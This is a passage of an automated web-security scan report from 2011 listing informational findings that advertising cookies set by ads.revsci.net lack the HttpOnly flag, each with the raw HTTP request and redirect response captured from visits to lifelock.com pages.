Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_BFfo="MLsXr9EvcS5joBDnTrInbrvzpTlezxNylzFx7q/7jh3vp9AaQ0d9+4VlnSrvgBJz6voGf2x+1Z6RdS2pI5TjgfZ77T3M2t7X2iBHBnAKpH5maLzmozIHYGm7ZsUgnorFipEdgxPJ/VuCSUSeSzr0fhvZs1RpQ2eynAXm+ZYRA0lY99PWYzTVxA+dgG4eyEo6fI6nOFv7VETg9VbOEYxF1bxw9rxFW2/VYfto5WLdqS8AVUs4gxrGXxowSUIPPw4TaPajZMsEG9QysBpXO9+vMJzhH7J7pRXm6jp5YWVv1nqFVwl5k//RXPfOpv8fCdS04EgjnPjAmJGexMwDpJoGPjBw2JOksGDgcEossWHD46TEJ5Ur3vHnDUTUWzfCTfvl2X7FBShnd/mjEZgT/74wiYnRHCJHCNJv/RnwYw=="; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BFfo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BFfo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0uRB="MLsXr98vcS5joAC3camm7m2LoDlezxNylzFx7q/7jh3vp9AaQ0d9+4VlvUgGPKQSVQ0KcSykIsBNoGXZdCAjuytlySGQ8/OftgBmlbDwxFXRsomko1dhpOEfNP9MWs6AJTpJGx4KVi3NyPLg6Ty1pZmBPol2v9eYT5WRqRvcf4u7txMu41iZYICzca0HKhAQnwG5+txYSjJVizEkhHghBeBMejkXDWkFVpZFcJOam5H6TC/Tk1UQDlT2PROx4nyyaEMjdDmLFNf1MZpXO9+vMJzhD7J7mRXm6jp5YWVv1nqFetXyeSI7ZLD/HSjFMKINO4FJgacxXDy5cV+HgtmUtTj0WAtVBJbk2nr4A7CJzwfNMNhtayL1bGn7HiJkIFLdmtlcSukRVDvh+KeaKP5f8TgfTiH6y91un+b23Q=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE+jMAYYlW2ENhuq3soH0f//DC7T+Ic8+Pr1nwUVevtCuE5/4IrgrPwDhQFpkUH9FP70YBKszuOe3UntXFMcTHLwgRLgVdrk3Un+lJZ/5e0yGlLruWUfqFPMt4Ra0+I8MJVwu20bf9vn4fQdGiwg6WnLAVuwjfo+LLfaow047Iln7+U+3J6ljUNMRuOkdO+Mn/yv8Ph4raozqmp2KbF/M/a1XxqebKzuxmu8P4iJRDp1Ntv4/dIGw9D2DMN9PwOraB87GBl1xM1/boOivuYYx7VVLswcQ1f1IVJRi0dVP1rSjeVFc9G1/w0gmA6W6SqbcuheULZwHUExIivYRsyPM4kPKIi65s9jlw8b0ygRfbJv54fQ2wlpR9gVd2TFYggAzs+RZG0d0XDMaGcg3JqM/wuDWn6Wub0A/DucMtOeFRNXtMWW31c4nOqAAjGb6dEXs6cNZjpO7StgJpoDpkVKZVGLKfEh9jQ9l6nSztR6DyjuvmxCgsa46ly8aszaWZYZJmTuIQbm69sfr5mW3/PK3SvJi6DXR0PMaJsaqJ5q9fCF3PFxL8LFhHm80FFGihrqbvB3bQHHLhlk8d2VR8SeYammYKxZevEfy1KHOMBa3YpJ2lN0Opstz27gxRQgqs/InUyx+li/d9t9KwaSz3VOxH0Ri4Yywxr7Ig6qmMk9xXzakMFVw4BGQRcMBBazm2cBmuu8nKUZKWJqXd5gkwvN2O+FhcMNi6UqYZEdlhfVc9wXJMhMgKs6B4oTJPFt6VptUoFNcs35hRw4EbB8HodfVeMO1nV/ce9raL2Krjq29xAZ/HV9fbmMqTnC0kkaMMPeIJ5jGritmycpL6Y9Y5aJbbmSj7WiK4jex59VdY8bmG18R7EK55Y9XONQd8/87mj2Com+PLwweMLwYNe5Gp3WWG5eIx0v8yJwjPizFzH5yT7Gz7hpI4/A90CViAXPC38wcaxfRCbbbXW9kJ1bot+CMUBQUZbSZUiCeNUh9IFhoqHhTFLLH6caSwzmpmqVNHQI9uZrOUh8WjlexA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:16:37 GMT


14.22. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/leadership/management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=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; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_btY7="MLsXr98vcS5joAC3cWnZbLu/LxacmO6l/ARkBxpP1JJrJebK5u0oIec5hQtxppxsRjkmyEG97JGtnHKzbcarrWXvOcKbltf7xkGa+l8zg6NsPWUKQV5HJAXQeFCR30Ociq0ao4q/grq6lsLC0KtAAADMs0buh6LSM9MG0LIcGHe70yIHgew/Eh0uLc+4c/4njp7GcyDdtqAZMSdSszG+gH0nvDhtaDXsHq2y65tYaObosUQZbnlscgHkfcZA4xP0oaQn/Lk2j36bu66uGkRrS4CsiWzoeFXOeaMh4yHFMNx7MqLYBUYmEVrbUD55ScTBefUUF0U4E7w5UEa9kMK7iC9gTmt3xw0L/2hRO9SwVqZNP64GcOJoZDuIezY3VtCazAUM7wNTb7K0tPc0/B538LlHHOIWHyDI6Pcx"; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_btY7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_btY7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_f0-W="MLsXr98vcS5joAD3TrInbrsHB6iUxxv6U9Ewo82dvq95LzyKcUd+SGxI5LXUVa5tqbfn/gBxYTeR02M2pSI8HR/ZfycAkbv/sDi9oySDDVp8H1BGXR3mIUBTO7FKiNbMke6vxBxCHU3H1o3TjA9xAN/W2fhrOqqGOw8C0qJAVmkXkdeVE7e0ejAJJ6HYYr7xC6Td58SGhALqjGJZwEN75CrLUsT4+Hzl5viSAFnI10jBinOo8ffl6vFjB/o0L1JNa/08FxWUp4CjxpsDaYpsY4Am5miDNP1KfB4UPjRwpkqxQ7FuRkQUKXgs11CqcjjGVzv3rkYig4aSw8VHmZ9t2ZFq2vFiY7rz2Ih8eifoUijie6EymXBguDwcPA4SNFV/B3bqofNbcpLSklSaW8DaoITTktjus8RrWDX2Zw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:16:55 GMT


14.23. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/offers/faces/female/?promocodehide=ADCONIONRT&c3metrics=adcon
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_o_YB="MLsXr98vcS5joAD3RWnZbLtzZAzP6/3QvbFY8brNjhfQZzRy/3X9YSyGbFxsN8G0yqulX+Pn6fT77EwpfyXgQdDoD8ExG9XdosQTSO5JaI/ifm4pCaBWAGUXgyxMnMeayp9qM4Dfxcgivu6oRZYK4tLsyUCNHsJzA0ue4bYZm3Yr1Ii/8Frh4YCDSU2AKRAYmYO4mhxXzjFVizEkhHghBeBMejkXDWkFVpZFdJBb+7HqzCzTk1UQDlT2PROx4nyyaEMjdDmLFND1M5pXG++vMJzhD7J7mRXm6jp5YWVv1nqFctXyeSI7ZLD/HSjFMKINO4FJgacx3JvckX6F4tmU1Fj0WAtVBJbk2nr4A7CJzwfNMNhtSyL1bGn7HiJkIFLdmtlcSukRVDvh+KeI1SEyoci/ul5Ntl5t9EXwew=="; rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hif7oMCGHppJ8S4dCaezGRJhlUWVyRvUosdoZNavV8q90zKD5s/ez6yLk/3MyALEhJth7PRDWcqYy1fztHQnZ+eGOprDErg4uKj3Y26WxWclP5Xwum07f9vg4fQdGgwgCWnLAVuwjXo9LLfaqw046Iln7+E+3F6qjUNIRuOkdO9MYwCv4CDy0/3Kb9+Wl3aCZv0ItNg1+yO6kh/JTRJxDejvBYxAgmw7i43J3ecXGUlCWv2i5Nf79A1wYSKmlJCIaymo3gG4KwA1yTTI6t4Nkc6tqs2NbI61n+o6xA+Y77YQlrYTI9JJbPgZKRz3+ulGoPGhSkQQ1GbdMwH+y/dWWUtyw24DCRz/AcqY3cG4oo0NIK9CLwBfQh26itpdy4mf8bOovwDj0eaa6g62V2hfDTysp7moX5MYjmHlhgj7JvXOxjXVuyAp1V0RKl12NJ3nGHMI65/MZUj90SXBV8RL5ZenSRMka2G3IaKIvKih5uQb+QJ7LqGL9pZiO2AudY9hX/aRFtAiCBuqTjfnnm2gMnEMf/52b9pFxHk+8EG6iwrqbv53bcHGIhlkcdyNR4SeoSXfFd48PzZdq4AIxW2yjYKjriwPAI6vnDIea4CL7QinSWNGEIkSqIXYtFNiYIVFvIJtS2MFxcfzJXdcAfn8ozwv03Bi0JzmeaCHEoIqyMSEqoJaI/JqaqOGOWdjmlZUYLQIBnDO+TGFxtx+FBjVY1sWLMrNv6c4B44LpPENQqOMcBXWyly86T6H2zx246HUzjUmwZ6jui1LBt9nRTW59ygZ/XX//bkI2DnA0okFtLxeR/J9gYwfiH+KRqguE7UJbbiSjrWiKo7Ox59VdZcbmC0ER00K5/r3XvdcFwpkzWDRZKpU65hkqtFIcZe5WmY38LsdMH268wBBiQqcAohZQHUG15pBgz3LB7kMWAUnSKHiE2X2pagnZmTVmWVP476LC8KGVdX2Eph7k1eYUQjRVJqr0q2tVIyN6OWkrSGPJKRsP1AZL3rEdIZfeg=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_o_YB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_o_YB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_hX-W="MLsXr98vcS5joAD35amm7m19U6iUxxv6U9Ewo82dvq95LzyKcUd+SGxIJH6o5AWlJkXeWWHv5qH4v/rM6OkMWqsFTvNPsXNekBTra/wwM4K2sibLTV2AOHFxkiVE9wV4/aofu4mf+YzCLyKAhfLTTeqCuZtujWf0mVUBm5iueociN9nMcHEBiWq4o9fatvXmE6yZ/0kCX73FbCLj/eLX67dLITBGr6Vts2oYC1XMLcjvcbHvF+Gfp+KabcKl3A3N5GRsbVvBxAgcV8qGf0I5oRF4rmVtRQWqfG3YSgbjakDBikQcLdr73FrrV7LpTFHBo/ShP4v0zweUXVvR2lDfsTUqd9mF4ch3/QIDNuIgzv2zwCKIcl4kIFp4Jb57PXWhqKOjlNBT/qEfJ76Dv808tBtcl+x2CIuaYlEz7rw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 12:34:33 GMT


14.24. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/how-it-works/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_2Ia5="MLsXr98vcS5joAD3TrInbrsHB6iUxxv6U9Ewo82dvq95LzyKcUd+SGxI5LXUVUbqNw0KcSykIgDMCLZ+LUekPkU3ZzHAnufPANfumkONPJ1vRRh59tenoHHjrRb5k67Sm6BnvhZOe1mCSUSYzT/0fgOACtqy5iXVomtxAZzacvIs1os8ctiYILCzcUGEKwAUbYDZ+gRfyTNVizEkjHghBeBOehkXDWkFVpZNcmrau472yi7Tk1UQDlT2PRGx4ny6aEMndDmCQRPdzJomsgEPKOZANGnQYsYrLEvr+wJqPo2Md9XyeSIz5rA/HijFNKINO3FJhacxFZoYVdm5OhizDcF2J4MFaMQYQ5VLkgCwK5k1whxQ3zMkV3gw6CsqcayotvrS10X59UwbUP/ABx6/FxtZ9qF5+9xsG5L3dw=="; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2Ia5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2Ia5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Kz1B="MLsXr98vcS5joAD3bWnZbLvnP/+KE1cvxxz+0wdb2PxBN+R0RSFIK3cKZ3+o5AVFSd5d5ssFdZ2XdS1J6ERW+BtM90GwO1Jf3J+svMJ4/csB8HP99h1rKGCqCGIh2xYI3Fvzvh3NuiMBnovWFDuF1xjfsYP1R8qsG42VULSa+sr/35iz34m/11lMDXN1AX9njioLN2ChPaIXlfxBectuiUVgU0P45W3JtxbyyxtPjFDFvSB3z65Y465ibv+/5utsqAHA6C7nBh6djpodR2d3ogV4aXJvd1v+vu8G0OhpMAsq67dES6DnMmod26xlYmpIm7oLLHQreFyS+X9JpEnNjiLVeG1pqatl8HZNbwSbBG8PdUu8OmYBIq2J4KA3tC3AUVE/bcNrvKaXikFYzLm/nYzn3T771H+QePf7"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hid7vWrRtcbg/87S4gsVar0CeCLBpcKI72Wvze9j97z84TKAm0Rt9ZtbR0ijMugza0Qe5pDtWTr6P4O2VTn9OWf69842Hfphbg/yHhecjeZxoBUgnlB/F2HdUOiY/FnNpAR6Yb4p11NSMhG/KP2u7EP6r3IydGDFeOiju1DJKUDpjfkg6EczNi2MImmflQIF1cOVVjLfTIctA84K1Duqop5MuAE9pP2A+QQfoGhYngbnTf97wilg35GyS3/8ryDOEJH5EumfAisx5oE+dY3kzYargOAvr0G9H+GYdgpAvQb5TKPGOgN6EiCaPSm5rnJxzMqA6rO3mpCX77qa2Ho0jD3aEltyb9bJMqJ9PwqUsVpjeSYp4WGNO3JRdKJxgfniKDmNefa2d1BW2Wh8kghoYpxfExL2Wjyu5Ewt0XZcuSo4HFo+cf7EfuqX3CStW3aNIaM2ycgH5HD7+aiYvP6CLDcIR9llQyuAnOJlOgf1SYPoNDEZiaROfoFMHCCACbTyTwsIZo7gKIyJzj6oBezmQIyuVdfB0qAsJlBrbXvSia2r0+p3f1uNsfNkdzUeqiXwrKqeL0cfZ/vrFCCr/HEZmnQwfSO4bhpS1mYMFRTXljVGrQBXZP23w1g4SB2g2r6MHc5Pzt36KPxeMWOL5418bzHZdWwqa13n89Ok/6a1QUG2VDo9UTTOb+JLnM2sYKk7sbkOFh4SBVM8phfg7sZLufZucWACOs/NLHHFV5agvJZmE1D0bSq1HSY5y44BZhNz2hBTwyEyITUaX2uP/Q1XHnliwNTiMU60QUP3w+Y3RPX0z5E/HIUe5Kt7Agvbwl+yWOum+d0YXNX2zxnx903R08ea5ceS5